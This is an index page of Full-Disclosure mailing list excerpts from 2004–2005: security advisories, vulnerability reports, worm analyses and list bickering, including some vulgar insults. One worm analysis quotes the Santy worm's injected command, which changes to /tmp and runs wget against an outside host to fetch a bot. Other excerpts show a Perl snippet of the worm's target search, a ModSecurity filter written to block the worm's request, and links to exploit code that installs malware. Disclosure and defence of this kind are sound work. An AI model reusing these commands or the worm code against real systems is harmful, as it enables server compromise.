~~~
Application:WinAce
Vendors:http://www.webtoolmaster.com
Versions: 1.4d
Platforms: Windows
Bug:GZIP File Directory Transversal
Exploitation: Local (extract file)
Date: 24 Dec 2004
~~~
Application:All Symantec Products All Versions Until 2005
Vendors: http://www.symantec.com/nav/nav_pro/
Platforms:Windows
Bug: Stack Buffer Overflow
Risk:Low - Crash - Not
When going to a bookmarked site which hosts public proxy lists I found out the
site was hacked. There was a meta-refresh to the attackers website, when
viewing the sourcode of the hacked webpage I noticed this
[style type=text/css]
body {CURSOR:
Policy is policy.
If the policy is to be ignored, then so can your copyright signs, any
security notices you put on your e-mails to do with
anti-theft/anti-eavesdrop or whatever else posted anywhere else.
There is no better way to express this issue than, if it gets
overruled then it will make a
~~~
Application:WinAce, WinHKI
Vendors:http://www.webtoolmaster.com
Versions: 1.4d
Platforms: Windows
Bug:ZIP File Directory Transversal
Exploitation: Local (extract file)
Date: 24
phased wrote:
yes you can suck my cock, mmmk thanks
THIS EMAIL IS (C) 2005 phased all rights reserved
-Original Message-
From: Steve Kudlak [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Date: Tue, 04 Jan 2005 13:11:36 -0800
Subject: Re: [Full-Disclosure] list noise
[EMAIL PROTECTED] wrote:
The relevant code:
-
$procura = 'inurl:*.php?*=' . $numr;
for($n=0;$n900;$n += 10){
$sock = IO::Socket::INET-new(PeerAddr = www.google.com.br, PeerPort =
80, Proto = tcp) or next;
print $sock GET /search?q=$procurastart=$n HTTP/1.0\n\n;
nothing new here...
unless... we try the L337
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Yes, that's exactly it. Thanks.
On Wed, 05 Jan 2005 18:33:39 -0800 ALD, Aditya, Aditya Lalit
Deshmukh [EMAIL PROTECTED] wrote:
- --SNIP--
;; QUESTION SECTION:
;www.microsoft.com. IN A
;; ANSWER SECTION:
www.microsoft.com. 2415
Juergen Schmidt wrote:
Hello,
the new santy version not only attacks phpBB.
How would these two worms react to classical hardening tips such as PHP
Safe mode and noexec /tmp ?
--
Stefano Raistlin Zanero
System Administrator Gioco.Net
public PGP key block at http://gioco.net/pgpkeys
===
Ubuntu Security Notice USN-55-1January 06, 2005
imlib2 vulnerabilities
CAN-2004-1025, CAN-2004-1026
===
A security issue affects the following Ubuntu releases:
Ubuntu
===
Ubuntu Security Notice USN-54-1January 06, 2005
tiff vulnerability
CAN-2004-1183
===
A security issue affects the following Ubuntu releases:
Ubuntu 4.10 (Warty Warthog)
They totally forgot HTA files and HTM help files. Who knows what else.
I do ;)
About switching to FireFox: if you drive a car you might end up in a
car-crash, changing cars doesn't prevent that. If 90% of people would be
driving the exact same car, it's obvious most car-crashes will involve
Um, log grep?
On Tue, 28 Dec 2004 20:48:05 +0100, Przemyslaw Frasunek
[EMAIL PROTECTED] wrote:
Hello,
I'm experiencing recently strange crashes of named 8.3.7 (shipped with FreeBSD
4.9). It never happened before, but since last saturday, it occured five
times.
Named suddenly stops
On Wed, Dec 29, 2004 at 17:32:33 +0100,
Ralf Glauberman [EMAIL PROTECTED] wrote:
so, here comes the old question: What do you think about this?
The main problem with allowing zone transfers by anyone is that it makes
denial of service attacks against the dns server easier.
I don't see other
Remote Code Execution with Parameters on Windows (XP
SP2): Updated (it can now install any malware file
from the Internet and run it without user interaction
needed)
PoC/Exploit:
http://freehost19.websamba.com/shreddersub7/cmdexe.htm
About the PoC/Exploit:
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200501-07
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - -
* Valdis Kletnieks:
On Wed, 05 Jan 2005 13:00:41 +0100, Florian Weimer said:
RIPE doesn't have an announcement of the prefix, so I think
MediaSentry was in error.
Did you just check the RADB, or did you actually poke a looking glass to
see what's actually being announced?
I searched the
hhctrl.ocx is not installed by default in all SP1s but is on all SP2.
Therefore when the exploit page tries to create the object he cannot
find it so it tries to install it. On SP2 it exists by default therefore
created silently.
i replied to this because of this statement by the O.P..
Any
Maxime Ducharme mducharme at cybergeneration.com wrote:
24.164.202.24 is on rr.com networks, they have also been advised.
I know rbot.exe is known to be Randex worm, but i'd like that have
some other results / analysis.
What i see is that this rBot.exe acts like regular rbot/sdbot
all
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
___
Mandrakelinux Security Update Advisory
___
Package name: vim
Advisory ID:
On Wed, 5 Jan 2005 18:27:25 -0500 (EST), [EMAIL PROTECTED]
[EMAIL PROTECTED] wrote:
Here is some additional information.
³ ircname : [UNC]69402
| channels : #!processor
³ server : shellcodewarez.info (ScW Network)
: idle : 4 hours 57 mins 9 secs (signon: Tue Jan 4 23:40:01 2005)
James Tucker wrote:
Policy is policy.
If the policy is to be ignored, then so can your copyright signs, any
security notices you put on your e-mails to do with
anti-theft/anti-eavesdrop or whatever else posted anywhere else.
There is no better way to express this issue than, if it gets
overruled
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Is anyone else seeing this:
- --SNIP--
;; QUESTION SECTION:
;www.microsoft.com. IN A
;; ANSWER SECTION:
www.microsoft.com. 2415IN CNAME
www.microsoft.com.nsatc.net.
- --SNIP--
Notice that www.microsoft.com is a cname
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200501-09
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - -
~~~
Application:WinHKI
Vendors:http://www.webtoolmaster.com
Versions: 1.4d
Platforms: Windows
Bug:CAB File Directory Transversal
Exploitation: Local (extract file)
Date: 24 Dec 2004
On Sat, 25 Dec 2004, Paul Laudanski wrote:
[code]
SecFilter visualcoders\.net/spy\.gif\?\cmd
SecFilter :/
[/code]
Just in case the URL changes, the latter should still get all sorts of:
http://
ftp://
Naturally, the latter also filters on
%3a%2f
I've been noticing some filters
###
Luigi Auriemma
Application: Amp II 3D engine
http://www.4drulers.com/amp.html
Versions: any version since there is no patch available
Games:Gore: Ultimate Soldier =
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200501-08
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - -
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
___
Mandrakelinux Security Update Advisory
___
Package name: wxGTK2
Advisory ID:
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
___
Mandrakelinux Security Update Advisory
___
Package name: libtiff
Advisory ID:
Ralf Glauberman wrote:
Hello all,
after Lode Vermeiren having published on the 7th of December that many
tlds are transferable I did further research on this. Much to my
surprise this wasn't just a problem of little states. i did a complete
scan on all tlds
Everyone else on gmail and with other good MTA filters getting these?
Thought it is interesting to note that so many (other people's)
addresses are being sent out in the probe...
- The following addresses had permanent fatal errors -
[EMAIL PROTECTED]
(reason: 550 Error: Message
Greeting list,
I have today determined that I can connect to a local MySQL-server per
mysql -usu. I regard that to error, can that someone confirm?
I use Gentoo with a MySQL 4.0.23 and I enough debian maschines. I can
connect from all maschines.
--
best regards
Sascha Wolf
mailto:[EMAIL
~~~
Application:WinAce, WinHKI
Vendors:http://www.webtoolmaster.com
Versions: 1.4d
Platforms: Windows
Bug:ZIP File Directory Transversal
Exploitation: Local (extract file)
Date: 24
On Sat, 25 Dec 2004, Kevin wrote:
On Fri, 24 Dec 2004 16:00:45 -0600 (CST), Ron DuFresne
[EMAIL PROTECTED] wrote:
It might depend upon how the algorithim is implimented, say, search for
easy to find vuln systems with stadard port open, till perhaps 10 or 100
or some given number are found
Arbitrary File Inclusion in SugarCRM
Author: Santiago Cortés
Date: Jan 06, 2005
Vulnerability:
Failure to
That was beautiful, brings a tear to my eEye.
J
-Original Message-
From: Marc Maiffret [mailto:[EMAIL PROTECTED]
Sent: Wednesday, December 29, 2004 8:33 PM
To: Lance Gusto; [EMAIL PROTECTED];
[EMAIL PROTECTED]; [EMAIL PROTECTED];
full-disclosure@lists.netsys.com; [EMAIL PROTECTED];
Hello!
The next, non-commercial, technological Security Forum will take place
on Sunday, the 16th of January, 2005, at Tel Aviv University's Lev
Auditorium.
We apologize for the cancellation of last month's first lecture on
wireless hacking. The Rogla, however, came with extra chocolate.
Schedule
At 06:23 PM 12/25/2004, [EMAIL PROTECTED] wrote:
I smell blood in the water - the sharks will be here soon... ;)
Well, of COURSE they will. Unlike the lazy dudes at Microsoft, no
self-respecting
worm or spyware author would goof off on Christmas when there was such a
tempting
vulnerability to
We have since upgraded, but among our new users over the last few days
have been a Weber361, a Weber395, and a nderevyanko.
Googling the last user name, I've found 4,900 referencesmost with
guestbooks or forumsto which nderevyanko has signed up. He has been
preceded by a few Webers,
===
Ubuntu Security Notice USN-53-1 December 29, 2004
imlib+png2 vulnerabilities
CAN-2004-1025, CAN-2004-1026
===
A security issue affects the following Ubuntu releases:
~~~
Application:WinHKI
Vendors:http://www.webtoolmaster.com
Versions: 1.4d
Platforms: Windows
Bug:ARC File Extraction of 1KB to 1.56GB
Exploitation: Local (extract file)
Date: 24 Dec
*** rfdslabs security advisory ***
Title: QNX crrtrap arbitrary file read/write vulnerability [RLSA_06-2004]
Versions: QNX RTOS 2.4, 4.25, 6.1.0, 6.2.0 (+ Update Patch A)
Vendor: http://www.qnx.com
Date: Dec 11 2004
Author: Julio Cesar Fort julio *NO_SPAM* rfdslabs com br
1. Introduction
- --SNIP--
;; QUESTION SECTION:
;www.microsoft.com. IN A
;; ANSWER SECTION:
www.microsoft.com. 2415IN CNAME
www.microsoft.com.nsatc.net.
- --SNIP--
Notice that www.microsoft.com is a cname for
www.microsoft.com.nsatc.net. It's not limited to www.microsoft.com
and
On Sun, 26 Dec 2004 09:00:28 +0100 Sune Kloppenborg Jeppesen
[EMAIL PROTECTED] wrote:
| -- Forwarded Message --
|
| Subject: Re: [USN-52-1] vim vulnerability
| Date: Friday 24 December 2004 05:31
| From: Liu Die Yu [EMAIL PROTECTED]
| To: Martin Pitt [EMAIL PROTECTED]
| Cc:
Hi all,
Holiday season greetings.
I am a PhD student at Princeton studying security. I am interested in
studying vulnerability statistics. I am interested in answering questions
like:
1. Which are the programs where bugs are found often?
2. Which vendors tend to be frequently affected?
3.
tigerteam.se security advisory - TSEAD-200412-1
www.tigerteam.se
Advisory: Hole in AOL's redirection scripts allow for abuse.
Date: Sat Dec 18 02:29:52 EST 2004
Application: AOL's redir, redir.adp, clickThruRedirect.adp, and
On 24 Dec 2004, at 14:06, Herman Sheremetyev wrote:
My patched phpBB 2.0.11 running on FreeBSD 4.10 was exploited by a new
variation of the worm this morning. I'm attaching the 2 perl scripts
it installs, one is an irc bot the other the worm itself.
The worm code attached uses the same old
On Sun, 26 Dec 2004 14:34:24 GMT, James Tucker said:
There are so many 'bits' that you simply could not filter all of them
using standard electronics.
The first bad assumption - that you even *need* to filter all the bits.
It would be the *very* poor intelligence agency that didn't apply some
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
___
Mandrakelinux Security Update Advisory
___
Package name: samba
Advisory ID:
I think you're best bet is to follow the instructions here:
- http://seclists.org/about/fulldisclosure.txt
Otherwise you'll notice that your request will never happen. ;)
--
Peace. ~G
On Wed, 22 Dec 2004 23:31:41 -0800 (PST), PBSoft Computer Labs (Peter)
[EMAIL PROTECTED] wrote:
G'day
I
All,
I've been subscribed to this list for a while now and have found it
generally speaking to be a very useful resource. On other occasions I
have found it to be full of trivial petty back stabbing conversations
that appear to be carried out by disenfranchised clowns who haven't yet
accepted
I'd have to agree with the eEye statement on this one. You sent out an
advisory without disclosing the details, which offers no real benefit to
anyone. Many people consider this responsible disclosure but that also
requires you to notify the vendor (there were no @eeye.com's in your
to list but
Exibar, IANAL...are you?
However, you do know that inheritence
laws differ from state to state and that in dealing with Yahoo! we are
dealing with an international? Also, I remain unconvinced of your
assertion that a default inheritor owns digital records. Can you
cite case law to support your
~~~
Application:WinHKI
Vendors:http://www.webtoolmaster.com
Versions: 1.4d
Platforms: Windows
Bug:BH File Directory Transversal
Exploitation: Local (extract file)
Date: 24 Dec 2004
Here are some samples of what this one does, and some statistics on
300,000 hits in 55 hours:
http://castlecops.com/article-5642-nested-0-0.html
On Sat, 25 Dec 2004, Adam wrote:
The request for this one (even against a non phpBB scripts) appears to
look like this:
GET
/bin/rm file access vulnerability
Affected Products:
/bin/rm (all versions, tested on FreeBSD and linux)
(http://www.freebsd.orghttp://www.kernel.org)
Author:
Xenzeo (Ablazed, Ultralaser, Lennart A. Hansen)
xenzeo at blackhat dot dk
/bin/rm is a program
Yes I
am aware that the laws differe from state to state. This would be a
federal case, a US Federal case, if it ever got that far, it won't. No
IANAL, but have first hand knowledge of a case very similliar to this.
Digitalproperty and physical property areconsidered the same
in cases
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200501-06
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - -
On Wed, 29 Dec 2004, Maurycy Prodeus wrote:
On my RedHat 9.0 with Mozilla 1.7.3 attached proof of concept code
overflows the buffer using attacker-supplied data. I decided to make
this bug public because Mozilla Team hasn't warned users.
As much as I respect what Mozilla folks are doing for
i think there is many like this
http://g.msn.com/0AD00014/?http://google.com
http://g.msn.com/0AD00014/?http://example.com
etc etc etc
your examples actually use an on-site URL redir
and i recall some from yahoo as well used extensivly for spam
im quite sure they ( AOL ) knows about this , and is
[EMAIL PROTECTED] wrote:
Please unsubscribe me from this list
We have received your request to be unsubscribed from
this list.
This is what you need to do. Please read these
instructions carefully before beginning.
Tools needed: one hammer, one screwdriver, one pair of
pliers, one heavy-duty
tigerteam.se security advisory - TSEAD-200412-2
www.tigerteam.se
Advisory: Multiple vulnerabilities in AOL and AOL affiliate web sites
Date: Sat Dec 18 15:47:40 EST 2004
Application: Multiple AOL web applications were found to be
On Fri, 31 Dec 2004 22:01:52 -0500, Exibar [EMAIL PROTECTED] wrote:
Heck, they probably already have their son's account information anyway...
I'm sure that someone, somewhere, hacked his account and gave them the
information. Or maybe they just guessed the PW
Ex
Because we all know
While I feel great compassion for the deceased Marine's father, I do not
believe that grief should override security, privacy, terms of service, and
good judgement. Any email Justin Ellsworth wished his father to have could
reasonably be expected to have been sent to his father prior to Justin's
Had a
mistake in my code o well. Works now
PoC:
http://www.michaelevanchik.com/security/microsoft/ie/xss/index.html
http://www.michaelevanchik.com/security/microsoft/ie/xss/writehta.txt
-- avp's should add this
Here
is some new adodb code AVP's should add. No longer needed to connect
Hi Nick,
looks like
'Microsoft Windows Kernel ANI File Parsing Crash and DOS Vulnerability'
for details see:
http://www.securityfocus.com/archive/1/385340/2004-12-18/2004-12-24/0
hth
tom
--
+++ Sparen Sie mit GMX DSL +++ http://www.gmx.net/de/go/dsl
AKTION für Wechsler: DSL-Tarife ab 3,99
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
___
Mandrakelinux Security Update Advisory
___
Package name: xpdf
Advisory ID:
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Yo All!
It parses their URLs and overwrites variables with strings like:
'http://www.visualcoders.net/spy.gif?cmd=cd /tmp;wget
www.visualcoders.net/spybot.txt;...
Looks like www.visualcoders.net is now parked at Godaddy.
So the virus has
KorWeblog php injection Vulnerability
Release Date : 2004/12/31 (KST)
Last Modified : 2005/01/01 (KST)
Author : Mins (mins at fsu.or.kr)
Product : KorWeblog http://weblog.kldp.org
Vendor-Status: Vendor was contacted but I could not receive reply message.
Vendor-Patches: None
Impact: Attacker can
--On Thursday, January 06, 2005 08:07:13 AM +0530 ALD, Aditya, Aditya
Lalit Deshmukh [EMAIL PROTECTED] wrote:
Dear paul I think you answered your own question over here - its perl!
Yeah, I'm beginning to think that's what I'm going to have to do.
However there is another tool ntop that I use
Sounds like you need AV and a bit of network security. If you are
scared of IRC trojans and detectable viruses..then your time would be better
spent putting those systems into place. Don't you think?
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Elle
I have today determined that I can connect to a local MySQL-server per
mysql -usu. I regard that to error, can that someone confirm?
You have entries in your mysql.user table that contain the hostname
localhost and have an empty username field, I presume. If so, please
read up on MySQL
Damn... you thought of a couple things that never even crossed my mind.
Nicely done, I like your style :)
Regards,
Byron
[EMAIL PROTECTED] wrote:
I'm not sure which is worse, the fact that we all now know that his system
is probably fair game for attack for another week, or that we now know that
Hi all,
a few days ago, I released a PoC from an exploit that can allow code execution from a webpage.
Some people asked me if it is possible to execute a random file, that comes from the Internet.
Now, I updated this PoC and it is possible to execute a malware file from the Internet.
That doesn't mean the ndervyanko fella is the perpetrator, but most
likely the victim.
This could very likely be true. It seemed like they were trying to
advertise a commercial website the same way spam does.
I don't read Russian, and my Lynx doesn't display it either. Looks like
some search
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
___
Mandrakelinux Security Update Advisory
___
Package name: cups
Advisory ID:
PoC (called CMDExe): http://www.freewebs.com/shreddersub7/htm.htm
Discussion: http://www.freewebs.com/shreddersub7/expl-discuss.htm
--Which systems are vulnerable?
Any system running any Microsoft Windows XP edition with Internet Explorer 6
or higher, even with SP2
Whoppix is a Knoppix remaster designed to be a standalone
penetration testing toolkit.
Whoppix includes a full set of penetration testing tools
and a huge repository of exploits (Framework 2.2, Packetstorm, Securityforest
and Securityfocus exploit archives).
You
can download Whoppix @
Well, for all who read this (and care) I tested a moderately old version
of SecureIIS I have installed on some VM, and I didn't see any calls to
CreateProcess anywhere in any of the eEye DLL's. Nor did I see any
suspicious getprocaddr's/loadlibrarya's that would indicate a backdoor.
For those
On Sat, 25 Dec 2004 12:36:16 MST, Brett Glass said:
Unfortunately, it's part of a big system DLL with tons of entry points. How
best to
shim it?
How *best* to shim it? oohh.. I smell blood in the water - the sharks will be
here soon... ;)
pgp2ucyRoNMIC.pgp
Description: PGP signature
Thanks, Lancelot, for proving that you have absolutely nothing worthy
to reporting.
.
-ASB
FAST, CHEAP, SECURE: Pick Any TWO
http://www.ultratech-llc.com/KB/
On Thu, 30 Dec 2004 03:00:33 +, Lance Gusto [EMAIL PROTECTED] wrote:
Hey Marky Mark and the Funky Bunch,
I will make this
Vendor: America Online
Inc.Date: January 1,
2005Issue: AOL's Online Password Reset feature does not
fully validate user informationURL: http://www.aol.com Advisory: http://www.lovebug.org/aolpwreset_advisory.txt
Service Overview:
This report is in reference to the Online Password Reset
Shunryu Suzuki wrote:
This is not the first time these allegations have come
up surrounding eEye and backdoors.
Can you post links, particularly substantiated links?
Sure one can look
at Marc's carefully worded retribution and pseudo
explanation of why we should just trust him (for the
sake of
On Thu, 30 Dec 2004, bkfsec wrote:
Yeah, I think that someone mistook the new year for April 1st.
When you feed trolls, they grow :-)
Seriously, we seem to be getting more crap like this. Are people just
bored?
I'm bored :-)
mx1# touch killme
mx1# chmod 0 killme
He's just letting us all know how important he is. It takes 2 people to
handle everything he can handle while there.
Ill be sure to contact Alexander with my ssh problem
~pingywon
-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Byron L.
Sonne
Sent:
Microsoft DATA Access Internet Publishing Service Provider DAV 1.1 component
of frontpage2000 is vulnerable to a special request of PUT a remote attacker
using this bug succeeds to write some
code html to the inside of the server victim
Proof Of Concept:
The remote attacker using the special
happy new year for all !
Microsoft WINS Remote Code Execution Exploit
(MS04-045)
http://www.k-otik.com/exploits/20041231.ZUC-WINShit.c.php
worked fine for me against a german windows :-)
__
Do you Yahoo!?
The all-new My Yahoo! - What will
I agree wholeheartedly.
On Mon, 27 Dec 2004 10:05:55 -0500, Mary Landesman [EMAIL PROTECTED] wrote:
While I feel great compassion for the deceased Marine's father, I do not
believe that grief should override security, privacy, terms of service, and
good judgement. Any email Justin Ellsworth
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200501-10
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - -
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200501-05
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - -
If I understood him correctly, he's poking fun at my classmate, Jonathan
Rockway, and the vulnerability he discovered in NASM.
In slashdot terms: It's funny. Laugh.
On Thu, 30 Dec 2004, Jerry wrote:
I have to agree with Shane on this. The whole point of the admin a.k.a root
user is to have
Hi,
I have today determined that I can connect to a local MySQL-server per
mysql -usu. I regard that to error, can that someone confirm?
I can confirm that I can connect, but not in access to any databases.
EG:
[EMAIL PROTECTED] dan $ mysql -usu
Welcome to the MySQL monitor. Commands end
sexy chicks read defaced ))
http://defaced.w6.ru/defaced7r.zip [rus]
http://defaced.w6.ru/defaced7e.zip [eng]
also mirror aviable here:
http://bluemystic.net/defaced/
--
anie lee
___
Full-Disclosure - We believe in it.
Charter:
They call it Project Hatem, their aim to take down as
many Whitehat Security sites as they can.
They do not believe in full disclosure, and do not
believe the moral values of the Whitehats. All they
believe in is power and destruction.
Well guess what? They got hacked also :P
Check it out:
On Sat, 2004-12-25 at 18:54 -0500, Jack Yan wrote:
Dear Full-Disclosure members:
I am not a computer expert, just a regular Joe who hopes this information
may be useful to you.
We are running phpBB and last week, a DoS attack was launched against us.
We have since upgraded, but
==
Secunia Research 04/01/2005
- Mozilla / Mozilla Firefox Download Dialog Source Spoofing -
==
Table of Contents
Affected
PowerTerm Source Code is still available.
http://home.comcast.net/~nodialtone/
-b
signature.asc
Description: This is a digitally signed message part
___
Full-Disclosure - We believe in it.
Charter:
so your company is making the finish lawz and it is gonna sue the guy with
his tax money?
your email revived my faith in modern democracy.
btw, i don't see anything wrong with finish parliament using unpatched
windoze - it just helps more people take part in the lawz making - what does
your
On Sun, 2 Jan 2005, Mortis wrote:
Do you know how cold it has to get for a bum to freeze on the sidewalk
overnight? I'm curious.
With or without ETOH to lower the freezing point of red cells?
I heard kids freeze quicker.
You might think so based upon mere size, but actually kids tend to
1 - 100 of 118 matches
Mail list logo